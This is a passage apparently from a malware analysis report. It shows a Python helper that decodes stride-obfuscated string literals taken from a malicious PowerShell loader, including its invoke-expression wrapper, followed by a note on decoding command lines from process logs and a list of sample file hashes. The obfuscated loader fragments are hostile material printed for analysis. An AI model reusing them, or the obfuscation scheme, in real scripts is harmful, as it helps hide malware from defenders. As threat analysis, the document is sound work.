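            "Sten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldp"
            "Isocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rred"
            "Bombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaM"
            "Kommuni ")
# First argument passed to Kend224, the script's invoke-expression wrapper.
GLOBAL_ASSIGN = ("Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using:"
                 " VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon"
                 " P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es "
                 "Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagm"
                 "BeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert"
                 " MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedar"
                 "antini,nAttachhemaskine)Forg,en ")

# Constructed fragment in the script's own shape (three statements).
FRAGMENT = ("$Ulivssaar=Anspndelserne '" + ULIVSSAAR + "';"
            + "$Truckful=Anspndelserne '" + TRUCKFUL + "';"
            + "Kend224 (Anspndelserne '" + GLOBAL_ASSIGN + "');")


def decode_sample():
    """Plaintext of the literals above, keyed by the script's variable names."""
    return {
        "$Truckful": decode(TRUCKFUL),
        "$Ulivssaar": decode(ULIVSSAAR),
        "$Veldreven": decode(VELDREVEN),
        "$Cobstone": decode(COBSTONE),
        "Kend224 arg": decode(GLOBAL_ASSIGN),
    }


if __name__ == "__main__":
    for name, value in decode_sample().items():
        print(f"{name:<12} {value}")
    print(deobfuscate(FRAGMENT))
```

Run deobfuscate over the whole command line (from a process-creation log rather than this page, because of the collapsed spaces) and the script reads as ordinary PowerShell; a decoded literal that still looks like filler means a stride boundary shifted, which is what a lost space does.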
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 4KB
  MD5: 365f45018b7bcc98591979d6c4b23752
  SHA1: 073aff125450845105f5daa7d0e7cc24ee8bbca5
  SHA256: 27be905cdbf87c23851d00d61afd5fcfe5c72b1de227ac7d8c0dc5c7583c9a6e
  SHA512: 4bd0d2266c624b9ad40e9ba6cb4d63debd12f46f5c27afae3bfc20e3e7f5e9f9c88f83151166324223c5889034a4d70652cf747f6943af011191c64c28e18703
- Filesize: 476KB
  MD5: 5b31fdcca43851229c6ad5c0d5124d9e
  SHA1: 95243324bfd6acd008518e233e5ac3a7a29e67a5
  SHA256: c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842
  SHA512: e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5
- Filesize: 144B
  MD5: 431cd2536a190a1c4f7b0038f9fa3e46
  SHA1: d7b7dc357b619008284bb09d56b88b6ab8f74eb3
  SHA256: 6cdb5757c487eb32b35e86e1c86725f55a8c443ceffd0adbf2f9ae54a44b762c
  SHA512: 4135eb3f0c395abc29e419d34c1ad2e34d98b3cf1042e53b0301e6293a05f343e27a04928702a08a9ac00bb889bddd4cf2fb0977a8abf6ff9706afa337387325